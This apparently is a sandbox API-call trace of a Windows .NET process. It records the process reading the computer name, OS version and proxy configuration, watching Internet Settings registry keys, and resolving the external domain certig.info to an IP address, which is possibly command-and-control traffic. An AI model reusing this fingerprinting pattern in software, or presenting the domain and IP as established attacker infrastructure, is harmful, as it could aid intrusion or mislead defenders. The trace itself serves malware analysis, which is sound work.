	[0116.506] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d3a8 | out: TokenHandle=0x1c70d3a8*=0x370) returned 1
	[0116.886] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.886] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d3a8 | out: TokenHandle=0x1c70d3a8*=0x374) returned 1
	[0116.896] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x378
	[0116.896] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0
	[0117.088] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.088] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d378 | out: TokenHandle=0x1c70d378*=0x3b4) returned 1
	[0117.210] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.210] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d378 | out: TokenHandle=0x1c70d378*=0x358) returned 1
	[0117.366] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.366] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d2b8 | out: TokenHandle=0x1c70d2b8*=0x380) returned 1
	[0117.374] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.374] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d2b8 | out: TokenHandle=0x1c70d2b8*=0x384) returned 1
	[0117.520] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.520] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d8f8 | out: TokenHandle=0x1c70d8f8*=0x388) returned 1
	[0117.580] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c70b9b8 | out: phkResult=0x1c70b9b8*=0x38c) returned 0x0
	[0117.580] RegQueryValueExW (in: hKey=0x38c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c70b93c, lpData=0x0, lpcbData=0x1c70b938*=0x0 | out: lpType=0x1c70b93c*=0x1, lpData=0x0, lpcbData=0x1c70b938*=0xe) returned 0x0
	[0117.580] CoTaskMemAlloc (cb=0x12) returned 0x1b88dcd0
	[0117.580] RegQueryValueExW (in: hKey=0x38c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c70b90c, lpData=0x1b88dcd0, lpcbData=0x1c70b908*=0xe | out: lpType=0x1c70b90c*=0x1, lpData="Client", lpcbData=0x1c70b908*=0xe) returned 0x0
	[0117.580] CoTaskMemFree (pv=0x1b88dcd0) 
	[0117.580] RegCloseKey (hKey=0x38c) returned 0x0
	[0117.623] CoTaskMemAlloc (cb=0xcd0) returned 0x1b890be0
	[0117.648] RasEnumConnectionsW (in: param_1=0x1b890be0, param_2=0x1c70d94c, param_3=0x1c70d948 | out: param_1=0x1b890be0, param_2=0x1c70d94c, param_3=0x1c70d948) returned 0x0
	[0117.655] CoTaskMemFree (pv=0x1b890be0) 
	[0117.809] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c70d758 | out: lpWSAData=0x1c70d758) returned 0
	[0117.819] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x404
	[0117.823] setsockopt (s=0x404, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0117.824] closesocket (s=0x404) returned 0
	[0117.824] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x404
	[0117.826] setsockopt (s=0x404, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0117.826] closesocket (s=0x404) returned 0
	[0117.833] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.833] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70cfd8 | out: TokenHandle=0x1c70cfd8*=0x404) returned 1
	[0117.954] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.954] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70cfd8 | out: TokenHandle=0x1c70cfd8*=0x408) returned 1
	[0118.003] GetCurrentProcessId () returned 0x8c4
	[0118.048] CoTaskMemAlloc (cb=0x204) returned 0x29f3d0
	[0118.048] GetComputerNameW (in: lpBuffer=0x29f3d0, nSize=0x3036428 | out: lpBuffer="XDUWTFONO", nSize=0x3036428) returned 1
	[0118.048] CoTaskMemFree (pv=0x29f3d0) 
	[0118.049] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c70d4b8 | out: phkResult=0x1c70d4b8*=0x40c) returned 0x0
	[0118.049] RegQueryValueExW (in: hKey=0x40c, lpValueName="Library", lpReserved=0x0, lpType=0x1c70d43c, lpData=0x0, lpcbData=0x1c70d438*=0x0 | out: lpType=0x1c70d43c*=0x1, lpData=0x0, lpcbData=0x1c70d438*=0x1c) returned 0x0
	[0118.049] CoTaskMemAlloc (cb=0x20) returned 0x1b891b90
	[0118.049] RegQueryValueExW (in: hKey=0x40c, lpValueName="Library", lpReserved=0x0, lpType=0x1c70d40c, lpData=0x1b891b90, lpcbData=0x1c70d408*=0x1c | out: lpType=0x1c70d40c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c70d408*=0x1c) returned 0x0
	[0118.049] CoTaskMemFree (pv=0x1b891b90) 
	[0118.049] RegQueryValueExW (in: hKey=0x40c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c70d43c, lpData=0x0, lpcbData=0x1c70d438*=0x0 | out: lpType=0x1c70d43c*=0x4, lpData=0x0, lpcbData=0x1c70d438*=0x4) returned 0x0
	[0118.050] RegQueryValueExW (in: hKey=0x40c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c70d440, lpData=0x1c70d43c, lpcbData=0x1c70d438*=0x4 | out: lpType=0x1c70d440*=0x4, lpData=0x1c70d43c*=0x1, lpcbData=0x1c70d438*=0x4) returned 0x0
	[0118.050] RegQueryValueExW (in: hKey=0x40c, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c70d43c, lpData=0x0, lpcbData=0x1c70d438*=0x0 | out: lpType=0x1c70d43c*=0x4, lpData=0x0, lpcbData=0x1c70d438*=0x4) returned 0x0
	[0118.050] RegQueryValueExW (in: hKey=0x40c, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c70d440, lpData=0x1c70d43c, lpcbData=0x1c70d438*=0x4 | out: lpType=0x1c70d440*=0x4, lpData=0x1c70d43c*=0x137a, lpcbData=0x1c70d438*=0x4) returned 0x0
	[0118.050] RegCloseKey (hKey=0x40c) returned 0x0
	[0118.093] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c70d478 | out: phkResult=0x1c70d478*=0x40c) returned 0x0
	[0118.093] RegQueryValueExW (in: hKey=0x40c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c70d3fc, lpData=0x0, lpcbData=0x1c70d3f8*=0x0 | out: lpType=0x1c70d3fc*=0x4, lpData=0x0, lpcbData=0x1c70d3f8*=0x4) returned 0x0
	[0118.093] RegQueryValueExW (in: hKey=0x40c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c70d400, lpData=0x1c70d3fc, lpcbData=0x1c70d3f8*=0x4 | out: lpType=0x1c70d400*=0x4, lpData=0x1c70d3fc*=0x3, lpcbData=0x1c70d3f8*=0x4) returned 0x0
	[0118.093] RegQueryValueExW (in: hKey=0x40c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c70d3fc, lpData=0x0, lpcbData=0x1c70d3f8*=0x0 | out: lpType=0x1c70d3fc*=0x4, lpData=0x0, lpcbData=0x1c70d3f8*=0x4) returned 0x0
	[0118.093] RegQueryValueExW (in: hKey=0x40c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c70d400, lpData=0x1c70d3fc, lpcbData=0x1c70d3f8*=0x4 | out: lpType=0x1c70d400*=0x4, lpData=0x1c70d3fc*=0x20000, lpcbData=0x1c70d3f8*=0x4) returned 0x0
	[0118.093] RegQueryValueExW (in: hKey=0x40c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c70d3fc, lpData=0x0, lpcbData=0x1c70d3f8*=0x0 | out: lpType=0x1c70d3fc*=0x3, lpData=0x0, lpcbData=0x1c70d3f8*=0xaa) returned 0x0
	[0118.093] RegQueryValueExW (in: hKey=0x40c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c70d3fc, lpData=0x3039718, lpcbData=0x1c70d3f8*=0xaa | out: lpType=0x1c70d3fc*=0x3, lpData=0x3039718*, lpcbData=0x1c70d3f8*=0xaa) returned 0x0
	[0118.097] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0118.173] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c70d3b0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0118.174] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x410
	[0118.177] MapViewOfFile (hFileMappingObject=0x410, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2930000
	[0118.178] VirtualQuery (in: lpAddress=0x2930000, lpBuffer=0x1c70d3a8, dwLength=0x30 | out: lpBuffer=0x1c70d3a8*(BaseAddress=0x2930000, AllocationBase=0x2930000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0118.178] LocalFree (hMem=0x307030) returned 0x0
	[0118.178] RegCloseKey (hKey=0x40c) returned 0x0
	[0118.217] GetVersionExW (in: lpVersionInformation=0x1c70c380*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c70c380*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0118.218] GetVersionExW (in: lpVersionInformation=0x1c70c350*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c70c350*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0118.219] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x303a3e8, cbSid=0x1c70d390 | out: pSid=0x303a3e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c70d390) returned 1
	[0118.237] CreateMutexW (lpMutexAttributes=0x303a5f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0118.238] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.242] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0118.251] GetCurrentProcessId () returned 0x8c4
	[0118.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0x414
	[0118.253] GetProcessTimes (in: hProcess=0x414, lpCreationTime=0x1c70d2a0, lpExitTime=0x1c70d298, lpKernelTime=0x1c70d290, lpUserTime=0x1c70d288 | out: lpCreationTime=0x1c70d2a0, lpExitTime=0x1c70d298, lpKernelTime=0x1c70d290, lpUserTime=0x1c70d288) returned 1
	[0118.253] CloseHandle (hObject=0x414) returned 1
	[0118.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x414
	[0118.254] GetProcessTimes (in: hProcess=0x414, lpCreationTime=0x1c70d330, lpExitTime=0x1c70d328, lpKernelTime=0x1c70d320, lpUserTime=0x1c70d318 | out: lpCreationTime=0x1c70d330, lpExitTime=0x1c70d328, lpKernelTime=0x1c70d320, lpUserTime=0x1c70d318) returned 1
	[0118.254] CloseHandle (hObject=0x414) returned 1
	[0118.254] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7cc) returned 0x414
	[0118.256] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.256] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.257] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x414, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c70d288, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c70d288*=0x418) returned 1
	[0118.258] CloseHandle (hObject=0x418) returned 1
	[0118.258] CloseHandle (hObject=0x414) returned 1
	[0118.260] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.260] CloseHandle (hObject=0x40c) returned 1
	[0118.323] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x303b4b0, cbSid=0x1c70d390 | out: pSid=0x303b4b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c70d390) returned 1
	[0118.323] CreateMutexW (lpMutexAttributes=0x303b668, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.324] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.324] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x303c2d8, cbSid=0x1c70d390 | out: pSid=0x303c2d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c70d390) returned 1
	[0118.324] CreateMutexW (lpMutexAttributes=0x303c490, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.325] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.325] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x303d110, cbSid=0x1c70d390 | out: pSid=0x303d110*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c70d390) returned 1
	[0118.325] CreateMutexW (lpMutexAttributes=0x303d2c8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.326] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.326] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x303df40, cbSid=0x1c70d390 | out: pSid=0x303df40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c70d390) returned 1
	[0118.326] CreateMutexW (lpMutexAttributes=0x303e0f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.327] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.328] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x303ed70, cbSid=0x1c70d340 | out: pSid=0x303ed70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c70d340) returned 1
	[0118.328] CreateMutexW (lpMutexAttributes=0x303ef28, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.329] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.329] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x303fb90, cbSid=0x1c70d340 | out: pSid=0x303fb90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c70d340) returned 1
	[0118.329] CreateMutexW (lpMutexAttributes=0x303fd48, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.329] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.330] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30409a8, cbSid=0x1c70d340 | out: pSid=0x30409a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c70d340) returned 1
	[0118.330] CreateMutexW (lpMutexAttributes=0x3040b60, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.330] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.330] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30417d0, cbSid=0x1c70d340 | out: pSid=0x30417d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c70d340) returned 1
	[0118.331] CreateMutexW (lpMutexAttributes=0x3041988, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.331] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.331] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30425f0, cbSid=0x1c70d340 | out: pSid=0x30425f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c70d340) returned 1
	[0118.332] CreateMutexW (lpMutexAttributes=0x30427a8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0118.332] ReleaseMutex (hMutex=0x40c) returned 1
	[0118.375] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x40c
	[0118.376] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x414
	[0118.377] ioctlsocket (in: s=0x40c, cmd=-2147195266, argp=0x1c70d978 | out: argp=0x1c70d978) returned 0
	[0118.500] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x418
	[0118.501] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c
	[0118.501] ioctlsocket (in: s=0x418, cmd=-2147195266, argp=0x1c70d978 | out: argp=0x1c70d978) returned 0
	[0118.526] WSAIoctl (in: s=0x40c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c70d8f0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c70d8f0, lpOverlapped=0x0) returned -1
	[0118.528] CoTaskMemAlloc (cb=0x204) returned 0x29f1c0
	[0118.528] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x29f1c0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0118.562] CoTaskMemFree (pv=0x29f1c0) 
	[0118.563] WSAEventSelect (s=0x40c, hEventObject=0x414, lNetworkEvents=512) returned 0
	[0118.563] WSAIoctl (in: s=0x418, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c70d8f0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c70d8f0, lpOverlapped=0x0) returned -1
	[0118.563] CoTaskMemAlloc (cb=0x204) returned 0x29f1c0
	[0118.563] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x29f1c0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0118.563] CoTaskMemFree (pv=0x29f1c0) 
	[0118.563] WSAEventSelect (s=0x418, hEventObject=0x41c, lNetworkEvents=512) returned 0
	[0118.563] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x420
	[0118.564] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x420, param_3=0x3) returned 0x0
	[0118.571] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c70da30 | out: phkResult=0x1c70da30*=0x438) returned 0x0
	[0118.573] RegOpenKeyExW (in: hKey=0x438, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c70d918 | out: phkResult=0x1c70d918*=0x43c) returned 0x0
	[0118.573] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x440
	[0118.574] RegNotifyChangeKeyValue (hKey=0x43c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x440, fAsynchronous=1) returned 0x0
	[0118.575] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c70d940 | out: phkResult=0x1c70d940*=0x444) returned 0x0
	[0118.575] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x448
	[0118.575] RegNotifyChangeKeyValue (hKey=0x444, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x448, fAsynchronous=1) returned 0x0
	[0118.576] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c70d940 | out: phkResult=0x1c70d940*=0x44c) returned 0x0
	[0118.576] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x450
	[0118.576] RegNotifyChangeKeyValue (hKey=0x44c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x450, fAsynchronous=1) returned 0x0
	[0118.576] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.576] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d8a8 | out: TokenHandle=0x1c70d8a8*=0x454) returned 1
	[0118.583] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.584] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d078 | out: TokenHandle=0x1c70d078*=0x458) returned 1
	[0118.589] GetCurrentProcess () returned 0xffffffffffffffff
	[0118.589] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d078 | out: TokenHandle=0x1c70d078*=0x45c) returned 1
	[0118.700] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c70d978 | out: pProxyConfig=0x1c70d978) returned 1
	[0118.988] SetEvent (hEvent=0x378) returned 1
	[0119.348] GetCurrentProcess () returned 0xffffffffffffffff
	[0119.348] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d0e8 | out: TokenHandle=0x1c70d0e8*=0x4b4) returned 1
	[0119.349] GetCurrentProcess () returned 0xffffffffffffffff
	[0119.349] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d0e8 | out: TokenHandle=0x1c70d0e8*=0x4b8) returned 1
	[0119.361] SetEvent (hEvent=0x378) returned 1
	[0119.481] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c70d5b8 | out: pFixedInfo=0x0, pOutBufLen=0x1c70d5b8) returned 0x6f
	[0119.614] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b8a8d60
	[0119.614] GetNetworkParams (in: pFixedInfo=0x1b8a8d60, pOutBufLen=0x1c70d5b8 | out: pFixedInfo=0x1b8a8d60, pOutBufLen=0x1c70d5b8) returned 0x0
	[0119.658] CoTaskMemAlloc (cb=0xd) returned 0x1b8a6550
	[0119.658] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0119.658] CoTaskMemFree (pv=0x1b8a6550) 
	[0119.661] LocalFree (hMem=0x1b8a8d60) returned 0x0
	[0119.752] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4cc
	[0119.753] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8
	[0119.755] CoTaskMemAlloc (cb=0xd) returned 0x1b8a6550
	[0119.756] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x1c70d560*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c70d558 | out: ppResult=0x1c70d558*=0x1b8987a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x1b8a6690*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0120.335] CoTaskMemFree (pv=0x1b8a6550) 
	[0120.335] CoTaskMemFree (pv=0x0) 
	[0120.337] FreeAddrInfoW (pAddrInfo=0x1b8987a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o.info", ai_addr=0x1b8a6690*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0120.338] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc
	[0120.338] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d4
	[0120.338] ioctlsocket (in: s=0x4dc, cmd=-2147195266, argp=0x1c70d578 | out: argp=0x1c70d578) returned 0
	[0120.338] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4
	[0120.339] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e8
	[0120.339] ioctlsocket (in: s=0x4e4, cmd=-2147195266, argp=0x1c70d578 | out: argp=0x1c70d578) returned 0
	[0120.339] WSAIoctl (in: s=0x4dc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c70d4f0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c70d4f0, lpOverlapped=0x0) returned -1
	[0120.339] CoTaskMemAlloc (cb=0x204) returned 0x29f7f0
	[0120.339] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x29f7f0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0120.339] CoTaskMemFree (pv=0x29f7f0) 
	[0120.339] WSAEventSelect (s=0x4dc, hEventObject=0x4d4, lNetworkEvents=512) returned 0
	[0120.339] WSAIoctl (in: s=0x4e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c70d4f0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c70d4f0, lpOverlapped=0x0) returned -1
	[0120.339] CoTaskMemAlloc (cb=0x204) returned 0x29f7f0
	[0120.339] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x29f7f0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0120.339] CoTaskMemFree (pv=0x29f7f0) 
